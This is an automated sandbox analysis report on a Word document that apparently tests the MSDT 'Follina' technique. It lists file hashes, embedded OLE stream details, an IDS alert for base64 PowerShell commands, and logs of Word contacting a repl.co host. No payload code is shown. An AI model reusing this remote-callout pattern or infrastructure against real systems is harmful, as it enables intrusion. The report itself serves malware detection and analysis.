            SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
            MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
            SHA1:23684CCAA587C442181A92E722E15A685B2407B1
            SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
            SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
            File type:Microsoft Word 2007+
            Entropy (8bit):7.316883678675453
            TrID:
            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
            • ZIP compressed archive (8000/1) 7.92%
            File name:C1ZGt61uGv.docx
            File size:26614
            MD5:98998af843c2c938c079a102abe6c73d
            SHA1:b1a1dda90b3df0ba5f23430a6c55c48a9c3dbe9d
            SHA256:b0cfd511498cbaed084fa622cfeb1a07de7478205cbff58cb40cb89091813593
            SHA512:4b3fee7cddc41a3f742d2ca3bcc6db766e43d183b926153927ec5591d73cce2d0cf5b4ade9d0f010bf6b104f463d44e383e423984d0bf5684e58971dd0665ee7
            SSDEEP:384:aW5NndAzG46H8kwV1xEw2imBTQUhGnhHpAKIQqRrINxt/ZtNNiW2+30Ony/6MY:awlO1Ew2HGHiKpqRrSxllN2+3By/e
            TLSH:DCC2C057D12B5C75CC6A4EBCD82C8ABCEA9430D0F9151187244DE6C9B24BD73133EA1A
            File Content Preview:PK..........!..l.$u...........[Content_Types].xml ...(.........................................................................................................................................................................................................
            Icon Hash:e4e6a2a2a4b4b4a4
            Document Type:OpenXML
            Number of OLE Files:1
            Has Summary Info:
            Application Name:
            Encrypted Document:False
            Contains Word Document Stream:True
            Contains Workbook/Book Stream:False
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:False
            Title:
            Subject:
            Author:Karewen .
            Keywords:
            Template:Normal.dotm
            Last Saved By:Karewen .
Revision Number:2
            Total Edit Time:0
            Create Time:2022-06-03T10:03:00Z
            Last Saved Time:2022-06-03T10:03:00Z
            Number of Pages:1
            Number of Words:3
            Number of Characters:18
            Creating Application:Microsoft Office Word
            Security:0
            Number of Lines:1
            Number of Paragraphs:1
            Thumbnail Scaling Desired:false
            Company:
            Contains Dirty Links:false
            Shared Document:false
            Changed Hyperlinks:false
            Application Version:16.0000
            General
            Stream Path:\x1CompObj
            File Type:data
            Stream Size:76
            Entropy:3.093449526469053
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . 9 q . . . . . . . . . . . .
            General
            Stream Path:\x1Ole10Native
            File Type:data
            Stream Size:2240124
            Entropy:0.005070123031127669
            Base64 Encoded:True
            Data ASCII:x . " . . . N e w B i t m a p i m a g e . b m p . D : \\ S a y a a r \\ P e r s o n a l \\ C o d i n g \\ M S D T Z e r o - D a y \\ M S F o l l i n a \\ N e w B i t m a p i m a g e . b m p . . . . . ^ . . . C : \\ U s e r s \\ k a r e w \\ A p p D a t a \\ L o c a l \\ T e m p \\ { 4 9 2 A 0 5 A 6 - 0 F C E - 4 3 E 2 - A F E 7 - D D 9 A E A 8 4 F C 1 B } \\ N e w B i t m a p i m a g e . b m p . 6 , " . B M 6 , " . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . , " . . . . . . . . . . . . . . . . .
            General
            Stream Path:\x3EPRINT
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Stream Size:10172
            Entropy:3.928478624213631
            Base64 Encoded:False
            Data ASCII:. . . . l . . . . . . . . . . . . . . I . . . . . . . . . . . ' . . . 9 . . . E M F . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . R . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . e . g . o . e . . U . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            General
            Stream Path:\x3ObjInfo
            File Type:data
            Stream Size:6
            Entropy:1.2516291673878228
            Base64 Encoded:False
            Data ASCII:. . . . . .
            Data Raw:00 00 03 00 0d 00
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/18/22-04:23:24.931708 | TCP | 2025010 | ET TROJAN Powershell commands sent B64 1 | 443 | 49176 | 35.186.245.55 | 192.168.2.22
08/18/22-04:23:28.806682 | TCP | 2025010 | ET TROJAN Powershell commands sent B64 1 | 443 | 49181 | 35.186.245.55 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 18, 2022 04:23:06.071744919 CEST | 192.168.2.22 | 8.8.8.8 | 0xeea0 | Standard query (0) | dullghostwhitetwintext.karewen.repl.co | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:18.824484110 CEST | 192.168.2.22 | 8.8.8.8 | 0x5748 | Standard query (0) | dullghostwhitetwintext.karewen.repl.co | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:18.939836979 CEST | 192.168.2.22 | 8.8.8.8 | 0x5dea | Standard query (0) | dullghostwhitetwintext.karewen.repl.co | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:23.852726936 CEST | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | dullghostwhitetwintext.karewen.repl.co | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:23.885284901 CEST | 192.168.2.22 | 8.8.8.8 | 0xbe50 | Standard query (0) | dullghostwhitetwintext.karewen.repl.co | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:27.740761995 CEST | 192.168.2.22 | 8.8.8.8 | 0x10d3 | Standard query (0) | dullghostwhitetwintext.karewen.repl.co | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:27.853646040 CEST | 192.168.2.22 | 8.8.8.8 | 0x722d | Standard query (0) | dullghostwhitetwintext.karewen.repl.co | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 18, 2022 04:23:06.182066917 CEST | 8.8.8.8 | 192.168.2.22 | 0xeea0 | No error (0) | dullghostwhitetwintext.karewen.repl.co | | 35.186.245.55 | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:18.931935072 CEST | 8.8.8.8 | 192.168.2.22 | 0x5748 | No error (0) | dullghostwhitetwintext.karewen.repl.co | | 34.149.204.188 | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:19.049377918 CEST | 8.8.8.8 | 192.168.2.22 | 0x5dea | No error (0) | dullghostwhitetwintext.karewen.repl.co | | 34.149.204.188 | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:23.871582985 CEST | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | dullghostwhitetwintext.karewen.repl.co | | 34.149.204.188 | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:23.994752884 CEST | 8.8.8.8 | 192.168.2.22 | 0xbe50 | No error (0) | dullghostwhitetwintext.karewen.repl.co | | 34.149.204.188 | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:27.850553036 CEST | 8.8.8.8 | 192.168.2.22 | 0x10d3 | No error (0) | dullghostwhitetwintext.karewen.repl.co | | 34.149.204.188 | A (IP address) | IN (0x0001)
Aug 18, 2022 04:23:27.959486961 CEST | 8.8.8.8 | 192.168.2.22 | 0x722d | No error (0) | dullghostwhitetwintext.karewen.repl.co | | 35.186.245.55 | A (IP address) | IN (0x0001)
            • dullghostwhitetwintext.karewen.repl.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49173 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 02:23:06 UTC | 0 | OUT | OPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
2022-08-18 02:23:07 UTC | 0 | IN | HTTP/1.1 404 Not Found
            Content-Length: 207
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:07 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758095; includeSubDomains
            Connection: close
2022-08-18 02:23:07 UTC | 0 | IN | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49174 | 34.149.204.188 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 02:23:19 UTC | 0 | OUT | HEAD /index.html HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
2022-08-18 02:23:19 UTC | 0 | IN | HTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:19 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758082; includeSubDomains
            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.22 | 49183 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 02:23:29 UTC | 17 | OUT | HEAD /index.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
2022-08-18 02:23:29 UTC | 18 | IN | HTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:29 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758072; includeSubDomains
            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49175 | 34.149.204.188 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 02:23:24 UTC | 1 | OUT | OPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            translate: f
            Host: dullghostwhitetwintext.karewen.repl.co
2022-08-18 02:23:24 UTC | 1 | IN | HTTP/1.1 404 Not Found
            Content-Length: 207
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:24 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758077; includeSubDomains
            Connection: close
2022-08-18 02:23:24 UTC | 1 | IN | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49176 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 02:23:24 UTC | 2 | OUT | GET /index.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: dullghostwhitetwintext.karewen.repl.co
            Connection: Keep-Alive
2022-08-18 02:23:24 UTC | 2 | IN | HTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:24 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758077; includeSubDomains
            Connection: close
2022-08-18 02:23:24 UTC | 2 | IN | Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna
2022-08-18 02:23:24 UTC | 3 | IN | Data Ascii: , semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In qui
2022-08-18 02:23:24 UTC | 5 | IN | Data Ascii: s, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at
2022-08-18 02:23:24 UTC | 6 | IN | Data Ascii: quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi c


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49177 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 02:23:26 UTC | 8 | OUT | HEAD /index.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
2022-08-18 02:23:26 UTC | 8 | IN | HTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:26 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758075; includeSubDomains
            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49178 | 35.186.245.55 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-18 02:23:27 UTC | 9 | OUT | HEAD /index.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
2022-08-18 02:23:27 UTC | 9 | IN | HTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:27 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758074; includeSubDomains
            Connection: close


            Session ID: 6 | Source IP: 192.168.2.22 | Source Port: 49179 | Destination IP: 35.186.245.55 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            2022-08-18 02:23:27 UTC | 9 | OUT | OPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
            2022-08-18 02:23:27 UTC | 9 | IN | HTTP/1.1 404 Not Found
            Content-Length: 207
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:27 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758074; includeSubDomains
            Connection: close
            2022-08-18 02:23:27 UTC | 10 | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


            Session ID: 7 | Source IP: 192.168.2.22 | Source Port: 49180 | Destination IP: 34.149.204.188 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            2022-08-18 02:23:28 UTC | 10 | OUT | HEAD /index.html HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            2022-08-18 02:23:28 UTC | 10 | IN | HTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:28 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758073; includeSubDomains
            Connection: close


            Session ID: 8 | Source IP: 192.168.2.22 | Source Port: 49181 | Destination IP: 35.186.245.55 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            2022-08-18 02:23:28 UTC | 10 | OUT | GET /index.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: dullghostwhitetwintext.karewen.repl.co
            Connection: Keep-Alive
            2022-08-18 02:23:28 UTC | 11 | IN | HTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:28 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758073; includeSubDomains
            Connection: close
            2022-08-18 02:23:28 UTC | 11 | IN | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0a 47 6f 6f 64 20 74 68 69 6e 67 20 77 65 20 64 69 73 61 62 6c 65 64 20 6d 61 63 72 6f 73 0a 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 3e 0a 4c 6f 72 65 6d 20 69 70 73 75 6d 20 64 6f 6c 6f 72 20 73 69 74 20 61 6d 65 74 2c 20 63 6f 6e 73 65 63 74 65 74 75 72 20 61 64 69 70 69 73 63 69 6e 67 20 65 6c 69 74 2e 20 51 75 69 73 71 75 65 20 70 65 6c 6c 65 6e 74 65 73 71 75 65 20 65 67 65 73 74 61 73 20 6e 75 6c 6c 61 20 69 6e 20 64 69 67 6e 69 73 73 69 6d 2e 20 4e 61 6d 20 69 64 20 6d 61 75 72 69 73 20 6c 6f 72 65 6d 2e 20 4e 75 6e 63 20 73 75 73 63 69 70 69 74 20 69 64 20 6d 61 67 6e 61
            Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna
            2022-08-18 02:23:28 UTC | 12 | IN | Data Raw: 2c 20 73 65 6d 70 65 72 20 74 75 72 70 69 73 20 75 74 2c 20 67 72 61 76 69 64 61 20 6c 6f 72 65 6d 2e 20 50 72 6f 69 6e 20 61 72 63 75 20 6c 69 67 75 6c 61 2c 20 76 65 6e 65 6e 61 74 69 73 20 61 6c 69 71 75 61 6d 20 74 72 69 73 74 69 71 75 65 20 75 74 2c 20 70 72 65 74 69 75 6d 20 71 75 69 73 20 76 65 6c 69 74 2e 0a 0a 50 68 61 73 65 6c 6c 75 73 20 74 72 69 73 74 69 71 75 65 20 6f 72 63 69 20 65 6e 69 6d 2c 20 61 74 20 61 63 63 75 6d 73 61 6e 20 76 65 6c 69 74 20 69 6e 74 65 72 64 75 6d 20 65 74 2e 20 41 65 6e 65 61 6e 20 6e 65 63 20 74 72 69 73 74 69 71 75 65 20 61 6e 74 65 2c 20 64 69 67 6e 69 73 73 69 6d 20 63 6f 6e 76 61 6c 6c 69 73 20 6c 69 67 75 6c 61 2e 20 41 65 6e 65 61 6e 20 71 75 69 73 20 66 65 6c 69 73 20 64 6f 6c 6f 72 2e 20 49 6e 20 71 75 69
            Data Ascii: , semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In qui
            2022-08-18 02:23:28 UTC | 14 | IN | Data Raw: 73 2c 20 74 75 72 70 69 73 20 64 6f 6c 6f 72 20 65 6c 65 69 66 65 6e 64 20 6d 61 73 73 61 2c 20 69 6e 20 6d 61 78 69 6d 75 73 20 73 61 70 69 65 6e 20 64 75 69 20 65 74 20 74 6f 72 74 6f 72 2e 20 51 75 69 73 71 75 65 20 76 61 72 69 75 73 20 65 6e 69 6d 20 73 65 64 20 65 6e 69 6d 20 76 65 6e 65 6e 61 74 69 73 20 74 65 6d 70 6f 72 2e 20 50 72 61 65 73 65 6e 74 20 71 75 69 73 20 76 6f 6c 75 74 70 61 74 20 6c 6f 72 65 6d 2e 20 50 65 6c 6c 65 6e 74 65 73 71 75 65 20 61 63 20 76 65 6e 65 6e 61 74 69 73 20 6c 61 63 75 73 2c 20 76 69 74 61 65 20 63 6f 6d 6d 6f 64 6f 20 6f 64 69 6f 2e 20 53 65 64 20 69 6e 20 6d 65 74 75 73 20 61 74 20 6c 69 62 65 72 6f 20 76 69 76 65 72 72 61 20 6d 6f 6c 6c 69 73 20 73 65 64 20 76 69 74 61 65 20 6e 69 62 68 2e 20 53 65 64 20 61 74
            Data Ascii: s, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at
            2022-08-18 02:23:28 UTC | 15 | IN | Data Raw: 20 71 75 69 73 20 65 6c 65 69 66 65 6e 64 20 6e 65 63 2c 20 73 75 73 63 69 70 69 74 20 73 69 74 20 61 6d 65 74 20 6d 61 73 73 61 2e 20 56 69 76 61 6d 75 73 20 69 6e 20 6c 65 63 74 75 73 20 65 72 61 74 2e 20 4e 75 6c 6c 61 20 66 61 63 69 6c 69 73 69 2e 20 56 69 76 61 6d 75 73 20 73 65 64 20 6d 61 73 73 61 20 71 75 69 73 20 61 72 63 75 20 65 67 65 73 74 61 73 20 76 65 68 69 63 75 6c 61 2e 20 4e 75 6c 6c 61 20 6d 61 73 73 61 20 6c 6f 72 65 6d 2c 20 74 69 6e 63 69 64 75 6e 74 20 73 65 64 20 66 65 75 67 69 61 74 20 71 75 69 73 2c 20 66 61 75 63 69 62 75 73 20 61 20 72 69 73 75 73 2e 20 53 65 64 20 76 69 76 65 72 72 61 20 74 75 72 70 69 73 20 73 69 74 20 61 6d 65 74 20 6d 65 74 75 73 20 69 61 63 75 6c 69 73 20 66 69 6e 69 62 75 73 2e 0a 0a 4d 6f 72 62 69 20 63
            Data Ascii: quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi c


            Session ID: 9 | Source IP: 192.168.2.22 | Source Port: 49182 | Destination IP: 35.186.245.55 | Destination Port: 443 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            2022-08-18 02:23:29 UTC | 17 | OUT | HEAD /index.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: dullghostwhitetwintext.karewen.repl.co
            Content-Length: 0
            Connection: Keep-Alive
            2022-08-18 02:23:29 UTC | 17 | IN | HTTP/1.1 200 OK
            Content-Length: 5901
            Content-Type: text/html; charset=utf-8
            Date: Thu, 18 Aug 2022 02:23:29 GMT
            Expect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"
            Replit-Cluster: global
            Server: Werkzeug/2.1.2 Python/3.8.12
            Strict-Transport-Security: max-age=7758072; includeSubDomains
            Connection: close


            No statistics
            Target ID: 0
            Start time: 04:22:15
            Start date: 18/08/2022
            Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit): false
            Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Imagebase: 0x13fd60000
            File size: 1423704 bytes
            MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: C, C++ or other language
            Reputation: high

            No disassembly